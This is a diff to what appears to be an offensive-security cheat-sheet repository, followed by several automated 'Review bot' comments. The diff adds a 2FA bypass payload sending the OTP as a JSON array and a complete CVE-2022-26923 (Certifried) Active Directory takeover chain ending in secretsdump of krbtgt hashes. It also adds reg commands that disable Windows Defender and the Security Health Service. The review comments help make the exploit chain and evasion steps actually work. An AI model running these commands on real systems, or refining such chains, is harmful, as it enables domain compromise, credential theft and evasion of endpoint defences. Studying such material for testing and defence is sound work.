diff --git a/Account Takeover/README.md b/Account Takeover/README.md index 23afbe2..5db6c97 100644 --- a/Account Takeover/README.md +++ b/Account Takeover/README.md @@ -28,6 +28,7 @@ * [Clickjacking on 2FA Disabling Page](#clickjacking-on-2fa-disabling-page) * [Enabling 2FA doesn't expire Previously active Sessions](#enabling-2fa-doesnt-expire-previously-active-sessions) * [Bypass 2FA with null or 000000](#bypass-2fa-with-null-or-000000) + * [Bypass 2FA with array](#bypass-2fa-with-array) * [References](#references) ## Password Reset Feature @@ -230,6 +231,22 @@ If the session is already hijacked and there is a session timeout vuln ### Bypass 2FA with null or 000000 Enter the code **000000** or **null** to bypass 2FA protection. +### Bypass 2FA with array + +```json +{ + "otp":[ + "1234", + "1111", + "1337", // GOOD OTP + "2222", + "3333", + "4444", + "5555" + ] +} +``` + ## TODO diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 49ba3a5..0244df0 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -2110,7 +2110,7 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' - Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD ```powershell - TERM1> python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local + TERM1> python printerbug.py testsegment.local/username@s2012exc.testsegment.local TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc ``` 
@@ -2120,7 +2120,7 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' ```powershell # create a new machine account TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support - TERM2> python printerbug.py relaytest.local/testuser@second-dc-server 10.0.2.6 + TERM2> python printerbug.py relaytest.local/username@second-dc-server 10.0.2.6 TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME # connect using the ticket 
@@ -2454,6 +2454,46 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 certipy relay -ca 172.16.19.100 ``` +#### Certifried CVE-2022-26923 + +> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege. + +* Find ms-DS-MachineAccountQuota + ```ps1 + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 getObjectAttributes 'DC=lab,DC=local' ms-DS-MachineAccountQuota + ``` +* Add a new computer in the Active Directory, by default `MachineAccountQuota = 10` + ```ps1 + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 addComputer cve 'CVEPassword1234*' + certipy account create 'lab.local/username:Password123*@dc.lab.local' -user 'cve' -dns 'dc.lab.local' + ``` +* [ALTERNATIVE] If you are `SYSTEM` and the `MachineAccountQuota=0`: Use a ticket for the current machine and reset its SPN + ```ps1 + Rubeus.exe tgtdeleg + export KRB5CCNAME=/tmp/ws02.ccache + python bloodyAD -d lab.local -u 'ws02$' -k --host dc.lab.local setAttribute 'CN=ws02,CN=Computers,DC=lab,DC=local' servicePrincipalName '[]' + ``` +* Set the `dNSHostName` attribute to match the Domain Controller hostname + ```ps1 + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 setAttribute 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName '["DC.lab.local"]' + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 getObjectAttributes 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName + ``` +* Request a ticket + ```ps1 + # certipy req 'domain.local/cve$:CVEPassword1234*@ADCS_IP' -template Machine -dc-ip DC_IP -ca discovered-CA + certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA + ``` +* Either use the pfx or set a RBCD on your machine account to takeover the domain + ```ps1 
+ certipy auth -pfx ./dc.pfx -dc-ip 10.10.10.10 + + openssl pkcs12 -in dc.pfx -out dc.pem -nodes + python bloodyAD.py -d lab.local -c ":dc.pem" -u 'cve$' --host 10.10.10.10 setRbcd 'CVE$' 'CRASHDC$' + getST.py -spn LDAP/CRASHDC.lab.local -impersonate Administrator -dc-ip 10.10.10.10 'lab.local/cve$:CVEPassword1234*' + secretsdump.py -user-status -just-dc-ntlm -just-dc-user krbtgt 'lab.local/Administrator@dc.lab.local' -k -no-pass -dc-ip 10.10.10.10 -target-ip 10.10.10.10 + ``` + + ### Dangerous Built-in Groups Usage If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object. @@ -3645,3 +3685,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) * [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) * [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/) +* [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4) +* [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 3027a9e..33352ec 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md 
@@ -115,6 +115,14 @@ MpCmdRun.exe -RemoveDefinitions -All # Remove signatures (if Internet connection is present, they will be downloaded again): PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All + +# Disable Windows Defender Security Center +reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f + +# Disable Real Time Protection +reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f +reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f +reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f ```
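Review bot: the new "Bypass 2FA with array" section in `Account Takeover/README.md` is only a JSON body with no sentence telling the reader what to do with it; add one line above the block explaining that the `otp` parameter is sent as a JSON array of candidate codes, so a backend that iterates over the array (or compares loosely) accepts the request if any element is the valid OTP, turning one request into a multi-candidate guess. Also, the `// GOOD OTP` comment makes the block invalid JSON despite the ` ```json ` tag; either move that note into the prose ("1337 is the valid code") or drop the language tag. The new TOC entry `* [Bypass 2FA with array](#bypass-2fa-with-array)` matches the heading, so that part is fine.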
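Review bot: in the `@@ -2120` hunk of `Active Directory Attack.md` the rename to `relaytest.local/username@second-dc-server` is fine, but the unchanged context line `getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' ...` still uses a host that is not in `relaytest.local`; while touching this block, make the SPN `host/second-dc-server.relaytest.local` (or whatever the lab FQDN is) so the relay target and the ticket request agree.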
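Review bot: several commands in the new `#### Certifried CVE-2022-26923` section will not run as written. In the `[ALTERNATIVE]` bullet, `python bloodyAD -d lab.local -u 'ws02$' -k ...` is missing the `.py` every other bloodyAD call in the section uses, and the step between `Rubeus.exe tgtdeleg` (which prints a base64 kirbi on the Windows host) and `export KRB5CCNAME=/tmp/ws02.ccache` (a ccache on the attacker box) is missing; add a line for the kirbi-to-ccache conversion (e.g. impacket's `ticketConverter.py`). In the last bullet the DC is called `CRASHDC$` / `LDAP/CRASHDC.lab.local` while it is `dc.lab.local` everywhere else in the section; pick one hostname. The `secretsdump.py ... -k -no-pass` line also depends on the ccache written by the preceding `getST.py` being exported into `KRB5CCNAME`, which is not shown. Finally, say why the `[ALTERNATIVE]` bullet clears `servicePrincipalName` before `dNSHostName` is rewritten: SPNs must be unique in the domain and `host/DC.lab.local` already belongs to the DC, so a computer object whose SPNs are derived from its hostname cannot have its `dNSHostName` set to the DC's name until those SPNs are removed; one sentence makes the order of the bullets non-arbitrary. Minor: the `getObjectAttributes ... dNSHostName` line after the `setAttribute` is a useful verification step and deserves a `# verify` comment.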
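Review bot: the references hunk appends the two new entries (`Certifried: Active Directory Domain Privilege Escalation ...` and `bloodyAD and CVE-2022-26923 ...`) without a trailing newline, as the `\ No newline at end of file` marker shows; add the newline so the next entry appended to this list does not show up as a change to this line.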
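Review bot: the two new comment headers in the `Windows - Persistence.md` hunk describe something other than what the commands do. `reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f` disables the Windows Security Health Service (the Windows Security app and its notifications), not the Defender engine, and only takes effect after a reboot, so the header should say "Disable Windows Security Center service" and note the reboot. Under `# Disable Real Time Protection`, `DisableAntiSpyware` and `DisableAntiVirus` turn the whole Defender AV off rather than real-time protection specifically (the real-time-protection policy is the `DisableRealtimeMonitoring` value under the `Real-Time Protection` subkey of that policy key), and on current Windows 10/11 builds `DisableAntiSpyware` is ignored by Defender and neither value takes effect while Tamper Protection is enabled; the block should state that Tamper Protection has to be off first, otherwise the reader will conclude the technique works when it does not. Also flag that `reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f` wipes every existing Defender policy value under that key, which a Group Policy refresh will restore and which is a noisy change on a monitored host; if the intent is only to clear conflicting settings, say so in the comment.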